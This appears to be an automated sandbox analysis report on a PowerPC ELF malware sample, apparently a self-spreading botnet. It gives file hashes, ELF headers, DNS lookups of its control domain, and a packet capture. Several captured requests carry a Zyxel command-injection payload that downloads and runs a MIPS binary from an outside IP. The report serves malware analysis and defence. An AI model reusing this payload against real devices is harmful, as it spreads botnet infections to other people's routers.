                                                SHA-512:62DC6B1669F84755D57A8FA4F8AFE7EF6BC19D60EEB14589648754A4F9D58194481E649AC1ED495B3CC45631B3D9F30611E9D28D13B7E7287C897E3F15B89E34
                                                Malicious:false
                                                Preview:/tmp/zogsXPGVgB.elf.
                                                Process:/tmp/zogsXPGVgB.elf
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20
                                                Entropy (8bit):4.1219280948873624
                                                Encrypted:false
                                                SSDEEP:3:TgYNw5:TgYu5
                                                MD5:BA2194D5B3C71C2D87175B3ED4815EA6
                                                SHA1:77A102B3013865F587E599094421AD6ED26690D0
                                                SHA-256:7257F057C4C396F9B7F31C39E0256245F2C3B32F63ACBA544404817E5B3680CF
                                                SHA-512:62DC6B1669F84755D57A8FA4F8AFE7EF6BC19D60EEB14589648754A4F9D58194481E649AC1ED495B3CC45631B3D9F30611E9D28D13B7E7287C897E3F15B89E34
                                                Malicious:false
                                                Preview:/tmp/zogsXPGVgB.elf.
                                                Process:/tmp/zogsXPGVgB.elf
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20
                                                Entropy (8bit):4.1219280948873624
                                                Encrypted:false
                                                SSDEEP:3:TgYNw5:TgYu5
                                                MD5:BA2194D5B3C71C2D87175B3ED4815EA6
                                                SHA1:77A102B3013865F587E599094421AD6ED26690D0
                                                SHA-256:7257F057C4C396F9B7F31C39E0256245F2C3B32F63ACBA544404817E5B3680CF
                                                SHA-512:62DC6B1669F84755D57A8FA4F8AFE7EF6BC19D60EEB14589648754A4F9D58194481E649AC1ED495B3CC45631B3D9F30611E9D28D13B7E7287C897E3F15B89E34
                                                Malicious:false
                                                Preview:/tmp/zogsXPGVgB.elf.
                                                Process:/tmp/zogsXPGVgB.elf
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20
                                                Entropy (8bit):4.1219280948873624
                                                Encrypted:false
                                                SSDEEP:3:TgYNw5:TgYu5
                                                MD5:BA2194D5B3C71C2D87175B3ED4815EA6
                                                SHA1:77A102B3013865F587E599094421AD6ED26690D0
                                                SHA-256:7257F057C4C396F9B7F31C39E0256245F2C3B32F63ACBA544404817E5B3680CF
                                                SHA-512:62DC6B1669F84755D57A8FA4F8AFE7EF6BC19D60EEB14589648754A4F9D58194481E649AC1ED495B3CC45631B3D9F30611E9D28D13B7E7287C897E3F15B89E34
                                                Malicious:false
                                                Preview:/tmp/zogsXPGVgB.elf.
                                                Process:/tmp/zogsXPGVgB.elf
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20
                                                Entropy (8bit):4.1219280948873624
                                                Encrypted:false
                                                SSDEEP:3:TgYNw5:TgYu5
                                                MD5:BA2194D5B3C71C2D87175B3ED4815EA6
                                                SHA1:77A102B3013865F587E599094421AD6ED26690D0
                                                SHA-256:7257F057C4C396F9B7F31C39E0256245F2C3B32F63ACBA544404817E5B3680CF
                                                SHA-512:62DC6B1669F84755D57A8FA4F8AFE7EF6BC19D60EEB14589648754A4F9D58194481E649AC1ED495B3CC45631B3D9F30611E9D28D13B7E7287C897E3F15B89E34
                                                Malicious:false
                                                Preview:/tmp/zogsXPGVgB.elf.
                                                Process:/tmp/zogsXPGVgB.elf
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20
                                                Entropy (8bit):4.1219280948873624
                                                Encrypted:false
                                                SSDEEP:3:TgYNw5:TgYu5
                                                MD5:BA2194D5B3C71C2D87175B3ED4815EA6
                                                SHA1:77A102B3013865F587E599094421AD6ED26690D0
                                                SHA-256:7257F057C4C396F9B7F31C39E0256245F2C3B32F63ACBA544404817E5B3680CF
                                                SHA-512:62DC6B1669F84755D57A8FA4F8AFE7EF6BC19D60EEB14589648754A4F9D58194481E649AC1ED495B3CC45631B3D9F30611E9D28D13B7E7287C897E3F15B89E34
                                                Malicious:false
                                                Preview:/tmp/zogsXPGVgB.elf.
                                                Process:/tmp/zogsXPGVgB.elf
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20
                                                Entropy (8bit):4.1219280948873624
                                                Encrypted:false
                                                SSDEEP:3:TgYNw5:TgYu5
                                                MD5:BA2194D5B3C71C2D87175B3ED4815EA6
                                                SHA1:77A102B3013865F587E599094421AD6ED26690D0
                                                SHA-256:7257F057C4C396F9B7F31C39E0256245F2C3B32F63ACBA544404817E5B3680CF
                                                SHA-512:62DC6B1669F84755D57A8FA4F8AFE7EF6BC19D60EEB14589648754A4F9D58194481E649AC1ED495B3CC45631B3D9F30611E9D28D13B7E7287C897E3F15B89E34
                                                Malicious:false
                                                Preview:/tmp/zogsXPGVgB.elf.
                                                Process:/tmp/zogsXPGVgB.elf
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20
                                                Entropy (8bit):4.1219280948873624
                                                Encrypted:false
                                                SSDEEP:3:TgYNw5:TgYu5
                                                MD5:BA2194D5B3C71C2D87175B3ED4815EA6
                                                SHA1:77A102B3013865F587E599094421AD6ED26690D0
                                                SHA-256:7257F057C4C396F9B7F31C39E0256245F2C3B32F63ACBA544404817E5B3680CF
                                                SHA-512:62DC6B1669F84755D57A8FA4F8AFE7EF6BC19D60EEB14589648754A4F9D58194481E649AC1ED495B3CC45631B3D9F30611E9D28D13B7E7287C897E3F15B89E34
                                                Malicious:false
                                                Preview:/tmp/zogsXPGVgB.elf.
                                                Process:/tmp/zogsXPGVgB.elf
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20
                                                Entropy (8bit):4.1219280948873624
                                                Encrypted:false
                                                SSDEEP:3:TgYNw5:TgYu5
                                                MD5:BA2194D5B3C71C2D87175B3ED4815EA6
                                                SHA1:77A102B3013865F587E599094421AD6ED26690D0
                                                SHA-256:7257F057C4C396F9B7F31C39E0256245F2C3B32F63ACBA544404817E5B3680CF
                                                SHA-512:62DC6B1669F84755D57A8FA4F8AFE7EF6BC19D60EEB14589648754A4F9D58194481E649AC1ED495B3CC45631B3D9F30611E9D28D13B7E7287C897E3F15B89E34
                                                Malicious:false
                                                Preview:/tmp/zogsXPGVgB.elf.
                                                Process:/tmp/zogsXPGVgB.elf
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20
                                                Entropy (8bit):4.1219280948873624
                                                Encrypted:false
                                                SSDEEP:3:TgYNw5:TgYu5
                                                MD5:BA2194D5B3C71C2D87175B3ED4815EA6
                                                SHA1:77A102B3013865F587E599094421AD6ED26690D0
                                                SHA-256:7257F057C4C396F9B7F31C39E0256245F2C3B32F63ACBA544404817E5B3680CF
                                                SHA-512:62DC6B1669F84755D57A8FA4F8AFE7EF6BC19D60EEB14589648754A4F9D58194481E649AC1ED495B3CC45631B3D9F30611E9D28D13B7E7287C897E3F15B89E34
                                                Malicious:false
                                                Preview:/tmp/zogsXPGVgB.elf.
                                                Process:/tmp/zogsXPGVgB.elf
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20
                                                Entropy (8bit):4.1219280948873624
                                                Encrypted:false
                                                SSDEEP:3:TgYNw5:TgYu5
                                                MD5:BA2194D5B3C71C2D87175B3ED4815EA6
                                                SHA1:77A102B3013865F587E599094421AD6ED26690D0
                                                SHA-256:7257F057C4C396F9B7F31C39E0256245F2C3B32F63ACBA544404817E5B3680CF
                                                SHA-512:62DC6B1669F84755D57A8FA4F8AFE7EF6BC19D60EEB14589648754A4F9D58194481E649AC1ED495B3CC45631B3D9F30611E9D28D13B7E7287C897E3F15B89E34
                                                Malicious:false
                                                Preview:/tmp/zogsXPGVgB.elf.
                                                Process:/tmp/zogsXPGVgB.elf
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20
                                                Entropy (8bit):4.1219280948873624
                                                Encrypted:false
                                                SSDEEP:3:TgYNw5:TgYu5
                                                MD5:BA2194D5B3C71C2D87175B3ED4815EA6
                                                SHA1:77A102B3013865F587E599094421AD6ED26690D0
                                                SHA-256:7257F057C4C396F9B7F31C39E0256245F2C3B32F63ACBA544404817E5B3680CF
                                                SHA-512:62DC6B1669F84755D57A8FA4F8AFE7EF6BC19D60EEB14589648754A4F9D58194481E649AC1ED495B3CC45631B3D9F30611E9D28D13B7E7287C897E3F15B89E34
                                                Malicious:false
                                                Preview:/tmp/zogsXPGVgB.elf.
                                                Process:/tmp/zogsXPGVgB.elf
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20
                                                Entropy (8bit):4.1219280948873624
                                                Encrypted:false
                                                SSDEEP:3:TgYNw5:TgYu5
                                                MD5:BA2194D5B3C71C2D87175B3ED4815EA6
                                                SHA1:77A102B3013865F587E599094421AD6ED26690D0
                                                SHA-256:7257F057C4C396F9B7F31C39E0256245F2C3B32F63ACBA544404817E5B3680CF
                                                SHA-512:62DC6B1669F84755D57A8FA4F8AFE7EF6BC19D60EEB14589648754A4F9D58194481E649AC1ED495B3CC45631B3D9F30611E9D28D13B7E7287C897E3F15B89E34
                                                Malicious:false
                                                Preview:/tmp/zogsXPGVgB.elf.
                                                Process:/tmp/zogsXPGVgB.elf
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20
                                                Entropy (8bit):4.1219280948873624
                                                Encrypted:false
                                                SSDEEP:3:TgYNw5:TgYu5
                                                MD5:BA2194D5B3C71C2D87175B3ED4815EA6
                                                SHA1:77A102B3013865F587E599094421AD6ED26690D0
                                                SHA-256:7257F057C4C396F9B7F31C39E0256245F2C3B32F63ACBA544404817E5B3680CF
                                                SHA-512:62DC6B1669F84755D57A8FA4F8AFE7EF6BC19D60EEB14589648754A4F9D58194481E649AC1ED495B3CC45631B3D9F30611E9D28D13B7E7287C897E3F15B89E34
                                                Malicious:false
                                                Preview:/tmp/zogsXPGVgB.elf.
                                                Process:/tmp/zogsXPGVgB.elf
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20
                                                Entropy (8bit):4.1219280948873624
                                                Encrypted:false
                                                SSDEEP:3:TgYNw5:TgYu5
                                                MD5:BA2194D5B3C71C2D87175B3ED4815EA6
                                                SHA1:77A102B3013865F587E599094421AD6ED26690D0
                                                SHA-256:7257F057C4C396F9B7F31C39E0256245F2C3B32F63ACBA544404817E5B3680CF
                                                SHA-512:62DC6B1669F84755D57A8FA4F8AFE7EF6BC19D60EEB14589648754A4F9D58194481E649AC1ED495B3CC45631B3D9F30611E9D28D13B7E7287C897E3F15B89E34
                                                Malicious:false
                                                Preview:/tmp/zogsXPGVgB.elf.
                                                Process:/tmp/zogsXPGVgB.elf
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20
                                                Entropy (8bit):4.1219280948873624
                                                Encrypted:false
                                                SSDEEP:3:TgYNw5:TgYu5
                                                MD5:BA2194D5B3C71C2D87175B3ED4815EA6
                                                SHA1:77A102B3013865F587E599094421AD6ED26690D0
                                                SHA-256:7257F057C4C396F9B7F31C39E0256245F2C3B32F63ACBA544404817E5B3680CF
                                                SHA-512:62DC6B1669F84755D57A8FA4F8AFE7EF6BC19D60EEB14589648754A4F9D58194481E649AC1ED495B3CC45631B3D9F30611E9D28D13B7E7287C897E3F15B89E34
                                                Malicious:false
                                                Preview:/tmp/zogsXPGVgB.elf.
                                                Process:/tmp/zogsXPGVgB.elf
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20
                                                Entropy (8bit):4.1219280948873624
                                                Encrypted:false
                                                SSDEEP:3:TgYNw5:TgYu5
                                                MD5:BA2194D5B3C71C2D87175B3ED4815EA6
                                                SHA1:77A102B3013865F587E599094421AD6ED26690D0
                                                SHA-256:7257F057C4C396F9B7F31C39E0256245F2C3B32F63ACBA544404817E5B3680CF
                                                SHA-512:62DC6B1669F84755D57A8FA4F8AFE7EF6BC19D60EEB14589648754A4F9D58194481E649AC1ED495B3CC45631B3D9F30611E9D28D13B7E7287C897E3F15B89E34
                                                Malicious:false
                                                Preview:/tmp/zogsXPGVgB.elf.
                                                Process:/tmp/zogsXPGVgB.elf
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20
                                                Entropy (8bit):4.1219280948873624
                                                Encrypted:false
                                                SSDEEP:3:TgYNw5:TgYu5
                                                MD5:BA2194D5B3C71C2D87175B3ED4815EA6
                                                SHA1:77A102B3013865F587E599094421AD6ED26690D0
                                                SHA-256:7257F057C4C396F9B7F31C39E0256245F2C3B32F63ACBA544404817E5B3680CF
                                                SHA-512:62DC6B1669F84755D57A8FA4F8AFE7EF6BC19D60EEB14589648754A4F9D58194481E649AC1ED495B3CC45631B3D9F30611E9D28D13B7E7287C897E3F15B89E34
                                                Malicious:false
                                                Preview:/tmp/zogsXPGVgB.elf.
                                                Process:/tmp/zogsXPGVgB.elf
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20
                                                Entropy (8bit):4.1219280948873624
                                                Encrypted:false
                                                SSDEEP:3:TgYNw5:TgYu5
                                                MD5:BA2194D5B3C71C2D87175B3ED4815EA6
                                                SHA1:77A102B3013865F587E599094421AD6ED26690D0
                                                SHA-256:7257F057C4C396F9B7F31C39E0256245F2C3B32F63ACBA544404817E5B3680CF
                                                SHA-512:62DC6B1669F84755D57A8FA4F8AFE7EF6BC19D60EEB14589648754A4F9D58194481E649AC1ED495B3CC45631B3D9F30611E9D28D13B7E7287C897E3F15B89E34
                                                Malicious:false
                                                Preview:/tmp/zogsXPGVgB.elf.
                                                Process:/tmp/zogsXPGVgB.elf
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):20
                                                Entropy (8bit):4.1219280948873624
                                                Encrypted:false
                                                SSDEEP:3:TgYNw5:TgYu5
                                                MD5:BA2194D5B3C71C2D87175B3ED4815EA6
                                                SHA1:77A102B3013865F587E599094421AD6ED26690D0
                                                SHA-256:7257F057C4C396F9B7F31C39E0256245F2C3B32F63ACBA544404817E5B3680CF
                                                SHA-512:62DC6B1669F84755D57A8FA4F8AFE7EF6BC19D60EEB14589648754A4F9D58194481E649AC1ED495B3CC45631B3D9F30611E9D28D13B7E7287C897E3F15B89E34
                                                Malicious:false
                                                Preview:/tmp/zogsXPGVgB.elf.
                                                File type:ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, stripped
                                                Entropy (8bit):5.7778529590290715
                                                TrID:
                                                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                File name:zogsXPGVgB.elf
                                                File size:152'508 bytes
                                                MD5:9e0ad1172ffb1d9a9024264a970d3573
                                                SHA1:2a16a3fd375ca3795a617773407a18aaa0f33841
                                                SHA256:0e7d08b6fb10ab0cde7281fc25962710608a9fc1508c7e3593194d768e48331d
                                                SHA512:5b7703ae7ff39d762411eed618e66699253044618b234528b2fab9321b3c4bc9ccb85e42e49a99e8cd033499933f1b6efa2392f19770ce80f4be121a18c75095
                                                SSDEEP:1536:XDs8NhE1FZaANrUY6DrxppvuR5ViwmbX4nFrwevAEWrEalvn8qEpW4YTOUIl1dTU:JE1jNWrxLG1YX6ruELYTBIpU
                                                TLSH:D4E33A02B31C0B07D1932EB43E3F6BD093AF9AD121E4F684655FAB8A9271D325546ECD
                                                File Content Preview:.ELF...........................4..Q......4. ...(.......................|...|..........................Q.............dt.Q.............................!..|......$H...H......$8!. |...N.. .!..|.......?.........R...../...@..\?......$.+../...A..$8...}).....$N..

                                                ELF header

                                                Class:ELF32
                                                Data:2's complement, big endian
                                                Version:1 (current)
                                                Machine:PowerPC
                                                Version Number:0x1
                                                Type:EXEC (Executable file)
                                                OS/ABI:UNIX - System V
                                                ABI Version:0
                                                Entry Point Address:0x100001f0
                                                Flags:0x0
                                                ELF Header Size:52
                                                Program Header Offset:52
                                                Program Header Size:32
                                                Number of Program Headers:3
                                                Section Header Offset:152028
                                                Section Header Size:40
                                                Number of Section Headers:12
                                                Header String Table Index:11
                                                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                NULL0x00x00x00x00x0000
                                                .initPROGBITS0x100000940x940x240x00x6AX004
                                                .textPROGBITS0x100000b80xb80x1bf400x00x6AX004
                                                .finiPROGBITS0x1001bff80x1bff80x200x00x6AX004
                                                .rodataPROGBITS0x1001c0180x1c0180x3e640x00x2A008
                                                .ctorsPROGBITS0x100200000x200000xc0x00x3WA004
                                                .dtorsPROGBITS0x1002000c0x2000c0x80x00x3WA004
                                                .dataPROGBITS0x100200200x200200x50e00x00x3WA0032
                                                .sdataPROGBITS0x100251000x251000x900x00x3WA004
                                                .sbssNOBITS0x100251900x251900x1300x00x3WA004
                                                .bssNOBITS0x100252c00x251900x44e80x00x3WA008
                                                .shstrtabSTRTAB0x00x251900x4b0x00x0001
                                                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                LOAD0x00x100000000x100000000x1fe7c0x1fe7c6.27040x5R E0x10000.init .text .fini .rodata
                                                LOAD0x200000x100200000x100200000x51900x97a81.24890x6RW 0x10000.ctors .dtors .data .sdata .sbss .bss
                                                GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Jan 12, 2024 18:23:52.273957968 CET192.168.2.138.8.8.80x7ce1Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:23:56.163759947 CET192.168.2.138.8.8.80x725fStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:24:05.033993959 CET192.168.2.138.8.8.80xb2c9Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:24:10.853096008 CET192.168.2.138.8.8.80x7d07Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:24:15.696290016 CET192.168.2.138.8.8.80x9313Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:24:21.521868944 CET192.168.2.138.8.8.80xce01Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:24:30.378000975 CET192.168.2.138.8.8.80xc421Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:24:38.250260115 CET192.168.2.138.8.8.80x2e6bStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:24:46.130456924 CET192.168.2.138.8.8.80x3a6bStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:24:48.959949017 CET192.168.2.138.8.8.80x8b78Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:24:51.819550991 CET192.168.2.138.8.8.80xe83aStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:25:02.671741962 CET192.168.2.138.8.8.80x6e92Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:25:07.674359083 CET192.168.2.138.8.8.80x6e92Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:25:17.560381889 CET192.168.2.138.8.8.80x773dStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:25:26.481559038 CET192.168.2.138.8.8.80x5381Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:25:32.412463903 CET192.168.2.138.8.8.80xc75bStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:25:38.308049917 CET192.168.2.138.8.8.80xf77cStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:25:44.234139919 CET192.168.2.138.8.8.80xf563Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:25:48.132497072 CET192.168.2.138.8.8.80xb464Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:25:52.053652048 CET192.168.2.138.8.8.80x9bc8Standard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:25:55.901892900 CET192.168.2.138.8.8.80x424cStandard query (0)haha.skyljne.clickA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Jan 12, 2024 18:23:52.398094893 CET8.8.8.8192.168.2.130x7ce1No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:23:56.265084028 CET8.8.8.8192.168.2.130x725fNo error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:24:05.137509108 CET8.8.8.8192.168.2.130xb2c9No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:24:10.966399908 CET8.8.8.8192.168.2.130x7d07No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:24:15.796927929 CET8.8.8.8192.168.2.130x9313No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:24:21.624480963 CET8.8.8.8192.168.2.130xce01No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:24:30.483201981 CET8.8.8.8192.168.2.130xc421No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:24:38.370942116 CET8.8.8.8192.168.2.130x2e6bNo error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:24:46.230700970 CET8.8.8.8192.168.2.130x3a6bNo error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:24:49.067922115 CET8.8.8.8192.168.2.130x8b78No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:24:51.939155102 CET8.8.8.8192.168.2.130xe83aNo error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:25:07.778234959 CET8.8.8.8192.168.2.130x6e92No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:25:17.661349058 CET8.8.8.8192.168.2.130x773dNo error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:25:26.589063883 CET8.8.8.8192.168.2.130x5381No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:25:32.512324095 CET8.8.8.8192.168.2.130xc75bNo error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:25:38.429800987 CET8.8.8.8192.168.2.130xf77cNo error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:25:44.338502884 CET8.8.8.8192.168.2.130xf563No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:25:48.233918905 CET8.8.8.8192.168.2.130xb464No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:25:52.153789997 CET8.8.8.8192.168.2.130x9bc8No error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Jan 12, 2024 18:25:56.002202988 CET8.8.8.8192.168.2.130x424cNo error (0)haha.skyljne.click103.245.236.188A (IP address)IN (0x0001)false
                                                Session IDSource IPSource PortDestination IPDestination Port
                                                0192.168.2.133446073.101.115.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.298590899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1192.168.2.1343834113.122.223.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.298721075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2192.168.2.1353752113.91.180.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.298738003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3192.168.2.1358426190.62.2.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.298763037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4192.168.2.135777671.245.29.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.298835993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5192.168.2.135432031.231.226.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.298923969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6192.168.2.1336636113.199.233.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.298928022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7192.168.2.136048095.47.142.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.298939943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8192.168.2.1354154178.63.205.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.298985958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9192.168.2.1345852216.210.198.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299073935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                10192.168.2.134684494.9.168.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299096107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11192.168.2.135599652.148.80.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299124956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                12192.168.2.1336212152.157.231.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:23:52.299138069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                13192.168.2.1341988189.145.70.191443
                                                TimestampBytes transferredDirectionData
